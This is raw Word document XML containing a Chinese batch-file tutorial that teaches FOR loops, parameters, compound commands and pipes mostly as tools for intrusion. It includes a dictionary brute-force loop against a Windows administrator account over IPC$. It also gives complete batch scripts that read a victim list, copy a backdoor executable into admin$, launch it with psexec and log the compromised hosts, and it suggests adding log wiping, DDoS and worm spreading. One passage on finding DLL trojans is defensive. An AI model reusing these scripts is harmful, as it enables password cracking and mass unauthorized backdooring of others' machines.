        <w:t xml:space="preserve">的目录，并将 %I 扩充到找到的第一个完全合格的名称。如果环境变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量未被定义，或者没有找到文件，此组合键会扩充空字符串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可以组合修饰符来得到多重结果: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%~dpI - 仅将 %I 扩充到一个驱动器号和路径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%~nxI - 仅将 %I 扩充到一个文件名和扩展名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%~fsI - 仅将 %I 扩充到一个带有短名的完整路径名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%~dp$PATH:i - 查找列在路径</w:t>
      </w:r>
      <w:hyperlink r:id="rId36" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00953959">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="336699"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>环境变量</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00953959">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">的目录，并将 %I 扩充到找到的第一个驱动器号和路径。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%~ftzaI - 将 %I 扩充到类似输出线路的 DIR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在以上例子中，%I 和 PATH 可用其他有效数值代替。%~ 语法用一个有效的 FOR 变量名终止。选取类似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%I 的大写变量名比较易读，而且避免与不分大小写的组合键混淆。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以上是MS的官方帮助，下面我们举几个例子来具体说明一下For命令在入侵中的用途。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sample2：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利用For命令来实现对一台目标Win2k主机的暴力密码破解。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我们用</w:t>
      </w:r>
      <w:hyperlink r:id="rId37" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00953959">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="336699"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>net use</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00953959">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> file://ip/ipc$ "password" /u:"administrator"来尝试这和目标主机进行连接，当成功时记下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密码。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最主要的命令是一条：for /f i% in (dict.txt) do </w:t>
      </w:r>
      <w:hyperlink r:id="rId38" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00953959">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="336699"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>net use</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00953959">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> file://ip/ipc$ "i%" /u:"administrator"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用i%来表示admin的密码，在dict.txt中这个取i%的值用</w:t>
      </w:r>
      <w:hyperlink r:id="rId39" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00953959">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="336699"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>net use</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00953959">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 命令来连接。然后将程序运行结果传递给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find命令－－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for /f i%% in (dict.txt) do net use file://ip/ipc$ "i%%" /u:"administrator"│find ":命令成功完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成"&gt;&gt;D:\ok.txt ，这样就ko了。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sample3：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你有没有过手里有大量</w:t>
      </w:r>
      <w:hyperlink r:id="rId40" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00953959">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="336699"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>肉鸡</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00953959">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">等着你去种后门＋木马呢？，当数量特别多的时候，原本很开心的一件事都会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变得很郁闷：）。文章开头就谈到使用批处理文件，可以简化日常或</w:t>
      </w:r>
      <w:hyperlink r:id="rId41" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00953959">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="336699"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>重复性</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00953959">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">任务。那么如何实现呢？呵呵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lastRenderedPageBreak/>
        <w:t xml:space="preserve">，看下去你就会明白了。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主要命令也只有一条：（在批处理文件中使用 FOR 命令时，指定变量使用 %%variable）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@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k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tokens的用法请参见上面的sample1，在这里它表示按顺序将victim.txt中的内容传递给door.bat中的参数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%i %j %k。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而cultivate.bat无非就是用net use命令来建立IPC$连接，并copy木马＋后门到victim，然后用返回码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（If errorlever =）来筛选成功种植后门的主机，并echo出来，或者echo到指定的文件。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delims= 表示vivtim.txt中的内容是一空格来分隔的。我想看到这里你也一定明白这victim.txt里的内容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是什么样的了。应该根据%%i %%j %%k表示的对象来排列，一般就是 ip password username。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代码</w:t>
      </w:r>
      <w:hyperlink r:id="rId42" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00953959">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="336699"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>雏形</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00953959">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserv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 cut here then save as a batchfile(I call it main.bat ) ---------------------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@echo off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@if "%1"=="" goto usage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@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k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@goto end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:usage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@echo run this batch in dos modle.or just double-click it.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:end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 cut here then save as a batchfile(I call it main.bat ) ---------------------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lastRenderedPageBreak/>
        <w:t xml:space="preserv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 cut here then save as a batchfile(I call it door.bat) ------------------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@net use file://%1/ipc$ %3 /u:"%2"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@if errorlevel 1 goto failed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@echo Trying to establish the IPC$ connection ............OK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@copy windrv32.exe\\%1\admin$\system32 &amp;&amp; if not errorlevel 1 echo IP %1 USER %2 PWD %3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&gt;&gt;ko.txt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@psexec file://%1/ c:\winnt\system32\windrv32.exe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@psexec file://%1/ net start windrv32 &amp;&amp; if not errorlevel 1 echo %1 Backdoored &gt;&gt;ko.txt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:failed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@echo Sorry can not connected to the victim.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 cut here then save as a batchfile(I call it door.bat) --------------------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这只是一个自动种植后门批处理的</w:t>
      </w:r>
      <w:hyperlink r:id="rId43" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00953959">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="336699"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>雏形</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00953959">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，两个批处理和</w:t>
      </w:r>
      <w:hyperlink r:id="rId44" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00953959">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="336699"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>后门程序</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00953959">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">（Windrv32.exe）,PSexec.exe需放在统一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目录下.批处理内容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尚可扩展,例如:加入清除日志+DDOS的功能,加入定时添加用户的功能,更深入一点可以使之具备自动传播功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能(蠕虫).此处不多做叙述,有兴趣的朋友可自行研究.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二.如何在批处理文件中使用参数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lastRenderedPageBreak/>
        <w:t xml:space="preserve">批处理中可以使用参数，一般从1%到 9%这九个，当有多个参数时需要用shift来移动，这种情况并不多见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，我们就不考虑它了。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sample1：fomat.bat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@echo off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if "%1"=="a" format a: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:format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@format a:/q/u/auotset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@echo please insert another disk to driver A.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@pause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@goto fomat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这个例子用</w:t>
      </w:r>
      <w:hyperlink r:id="rId45" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00953959">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="336699"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>于连</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00953959">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">续地格式化几张软盘，所以用的时候需在dos窗口输入fomat.bat a，呵呵,好像有点画蛇添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足了～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sample2：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当我们要建立一个IPC$连接地时候总要输入一大串命令，弄不好就打错了，所以我们不如把一些固定命令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写入一个批处理，把</w:t>
      </w:r>
      <w:hyperlink r:id="rId46" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00953959">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="336699"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>肉鸡</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00953959">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">地ip password username 当着参数来赋给这个批处理，这样就不用每次都打命令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了。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@echo off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@net use file://1%/ipc$ "2%" /u:"3%" 注意哦，这里PASSWORD是第二个参数。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@if errorlevel 1 echo connection failed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怎么样,使用参数还是比较简单的吧？你这么帅一定学会了.No.3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三.如何使用组合命令(Compound Command)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lastRenderedPageBreak/>
        <w:t xml:space="preserve">1.&amp;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Usage：第一条命令 &amp; 第二条命令 [&amp; 第三条命令...]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用这种方法可以同时执行多条命令，而不管命令是否执行成功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Sample：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C:\&gt;dir z: &amp; dir c:\Ex4rch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The system cannot find the path specified.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Volume in drive C has no label.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Volume Serial Number is 0078-59FB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Directory of c:\Ex4rch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2002-05-14 23:51 .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2002-05-14 23:51 ..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2002-05-14 23:51 14 sometips.gif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2.&amp;&amp;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Usage：第一条命令 &amp;&amp; 第二条命令 [&amp;&amp; 第三条命令...]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用这种方法可以同时执行多条命令，当碰到执行出错的命令后将不执行后面的命令，如果一直没有出错则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一直执行完所有命令；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Sample：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C:\&gt;dir z: &amp;&amp; dir c:\Ex4rch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The system cannot find the path specified.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C:\&gt;dir c:\Ex4rch &amp;&amp; dir z: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Volume in drive C has no label.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Volume Serial Number is 0078-59FB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Directory of c:\Ex4rch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2002-05-14 23:55 .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2002-05-14 23:55 ..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2002-05-14 23:55 14 sometips.gif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1 File(s) 14 bytes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2 Dir(s) 768,671,744 bytes free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The system cannot find the path specified.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在做</w:t>
      </w:r>
      <w:hyperlink r:id="rId47" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00953959">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="336699"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>备份</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00953959">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">的时候可能会用到这种命令会比较简单，如：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dir file&amp;://192.168.0.1/database/backup.mdb &amp;&amp; copy file&amp;://192.168.0.1/database/backup.mdb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E:\backup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如果远程服务器上存在backup.mdb文件，就执行copy命令，若不存在该文件则不执行copy命令。这种用法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可以替换IF exist了.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3.││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Usage：第一条命令 ││ 第二条命令 [││ 第三条命令...]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用这种方法可以同时执行多条命令，当碰到执行正确的命令后将不执行后面的命令，如果没有出现正确的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命令则一直执行完所有命令；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Sample：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C:\Ex4rch&gt;dir sometips.gif ││ del sometips.gif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Volume in drive C has no label.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Volume Serial Number is 0078-59FB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Directory of C:\Ex4rch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2002-05-14 23:55 14 sometips.gif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lastRenderedPageBreak/>
        <w:t xml:space="preserve">1 File(s) 14 bytes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0 Dir(s) 768,696,320 bytes free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组合命令使用的例子：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sample：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@copy trojan.exe file://%1/admin$/system32 &amp;&amp; if not errorlevel 1 echo IP %1 USER %2 PASS %3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&gt;&gt;victim.txt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四、管道命令的使用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1.│ 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Usage：第一条命令 │ 第二条命令 [│ 第三条命令...]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将第一条命令的结果作为第二条命令的参数来使用，记得在unix中这种方式很常见。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sample：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time /t&gt;&gt;D:\IP.log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netstat -n -p tcp│find ":3389"&gt;&gt;D:\IP.log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start Explorer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看出来了么？用于终端服务允许我们为用户自定义起始的程序，来实现让用户运行下面这个bat，以获得登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录用户的IP。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2.&gt;、&gt;&gt;输出</w:t>
      </w:r>
      <w:hyperlink r:id="rId48" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00953959">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="336699"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>重定向</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00953959">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">命令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将一条命令或某个程序输出结果的</w:t>
      </w:r>
      <w:hyperlink r:id="rId49" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00953959">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="336699"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>重定向</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00953959">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">到特定文件中, &gt; 与 &gt;&gt;的区别在于，&gt;会清除调原有文件中的内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容后写入指定文件，而&gt;&gt;只会追加内容到指定文件中，而不会改动其中的内容。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sample1：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echo </w:t>
      </w:r>
      <w:hyperlink r:id="rId50" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00953959">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="336699"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>hello world</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00953959">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;c:\hello.txt (stupid example?)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sample2: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时下DLL木马盛行，我们知道system32是个</w:t>
      </w:r>
      <w:hyperlink r:id="rId51" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00953959">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="336699"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>捉迷藏</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00953959">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">的好地方，许多木马都削尖了脑袋往那里钻，DLL马也不 例外，针对这一点我们可以在安装好系统和必要的应用程序后，对该目录下的EXE和DLL文件作一个记录：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运行CMD--转换目录到system32--dir *.exe&gt;exeback.txt &amp; dir *.dll&gt;dllback.txt,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这样所有的EXE和DLL文件的名称都被分别记录到exeback.txt和dllback.txt中,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日后如发现异常但用传统的方法查不出问题时,则要考虑是不是系统中已经潜入DLL木马了.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这时我们用同样的命令将system32下的EXE和DLL文件记录到另外的exeback1.txt和dllback1.txt中,然后运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行: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CMD--fc exeback.txt exeback1.txt&gt;diff.txt &amp; fc dllback.txt dllback1.txt&gt;diff.txt.(用FC命令比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较前后两次的DLL和EXE文件,并将结果输入到diff.txt中),这样我们就能发现一些多出来的DLL和EXE文件,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然后通过查看创建时间、版本、是否经过压缩等就能够比较容易地判断出是不是已经被DLL木马光顾了。没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有是最好，如果有的话也不要直接DEL掉，先用regsvr32 /u trojan.dll将后门DLL文件注销掉,再把它移到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回收站里，若系统没有异常反映再将之彻底删除或者提交给杀毒软件公司。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3.&lt; 、&gt;&amp; 、&lt;&amp;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 xml:space="preserve">&lt; 从文件中而不是从键盘中读入命令输入。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&gt;&amp; 将一个</w:t>
      </w:r>
      <w:hyperlink r:id="rId52" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00953959">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="336699"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>句柄</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00953959">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的输出写入到另一个</w:t>
      </w:r>
      <w:hyperlink r:id="rId53" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00953959">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="336699"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>句柄</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00953959">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">的输入中。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&lt;&amp; 从一个</w:t>
      </w:r>
      <w:hyperlink r:id="rId54" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00953959">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="336699"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>句柄</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00953959">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">读取输入并将其写入到另一个句柄输出中。 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00953959" w:rsidRPr="00953959" w:rsidRDefault="00953959" w:rsidP="00953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1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00953959">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这些并不常用，也就不多做介绍。</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8D1" w:rsidRDefault="00ED08D1" w:rsidP="00953959">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00ED08D1" w:rsidRDefault="00ED08D1" w:rsidP="0095395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8D1" w:rsidRDefault="00ED08D1" w:rsidP="00953959">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00ED08D1" w:rsidRDefault="00ED08D1" w:rsidP="00953959">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3E32CD"/>
    <w:rsid w:val="00426133"/>
    <w:rsid w:val="004358AB"/>
    <w:rsid w:val="008B7726"/>
    <w:rsid w:val="00953959"/>
    <w:rsid w:val="00D31D50"/>
    <w:rsid w:val="00DA67C1"/>
    <w:rsid w:val="00ED08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5395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953959"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00953959"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char0">
    <w:name w:val="页脚 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a4"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00953959"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTML">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="HTMLChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00953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953959"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a5">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00953959"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
</w:styles>
</file>

<file path=word/webSettings.xml><?xml version="1.0" encoding="utf-8"?>
<w:webSettings xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
  <w:divs>
    <w:div w:id="172775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zhidao.baidu.com/search?word=if%E8%AF%AD%E5%8F%A5&amp;fr=qb_search_exp&amp;ie=utf8" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zhidao.baidu.com/search?word=%E8%BF%90%E8%A1%8C%E5%91%BD%E4%BB%A4&amp;fr=qb_search_exp&amp;ie=utf8" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zhidao.baidu.com/search?word=%E5%88%86%E9%9A%94%E7%AC%A6&amp;fr=qb_search_exp&amp;ie=utf8" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zhidao.baidu.com/search?word=net%20use&amp;fr=qb_search_exp&amp;ie=utf8" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zhidao.baidu.com/search?word=%E9%80%9A%E9%85%8D%E7%AC%A6&amp;fr=qb_search_exp&amp;ie=utf8" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zhidao.baidu.com/search?word=%E6%96%87%E4%BB%B6%E5%B1%9E%E6%80%A7&amp;fr=qb_search_exp&amp;ie=utf8" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zhidao.baidu.com/search?word=%E9%9B%8F%E5%BD%A2&amp;fr=qb_search_exp&amp;ie=utf8" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zhidao.baidu.com/link?url=yrLnQpSDc58d_RI_mnh_sA5O6PSLL5wzvZJ0uFLtKiwRtAwO2UAyEAT-wMK0u4_xTFLgFoYPiGopguO1b657Aq" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zhidao.baidu.com/search?word=hello%20world&amp;fr=qb_search_exp&amp;ie=utf8" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zhidao.baidu.com/search?word=%E9%87%8D%E5%AE%9A%E5%90%91&amp;fr=qb_search_exp&amp;ie=utf8" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zhidao.baidu.com/search?word=%E4%BC%98%E5%85%88%E7%BA%A7&amp;fr=qb_search_exp&amp;ie=utf8" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zhidao.baidu.com/search?word=config.sys&amp;fr=qb_search_exp&amp;ie=utf8" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zhidao.baidu.com/search?word=%E5%88%86%E9%9A%94%E7%AC%A6&amp;fr=qb_search_exp&amp;ie=utf8" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zhidao.baidu.com/search?word=%E6%96%87%E4%BB%B6%E6%89%A9%E5%B1%95%E5%90%8D&amp;fr=qb_search_exp&amp;ie=utf8" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zhidao.baidu.com/search?word=net%20use&amp;fr=qb_search_exp&amp;ie=utf8" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zhidao.baidu.com/search?word=%E8%82%89%E9%B8%A1&amp;fr=qb_search_exp&amp;ie=utf8" TargetMode="External"/><Relationship Id="rId2" 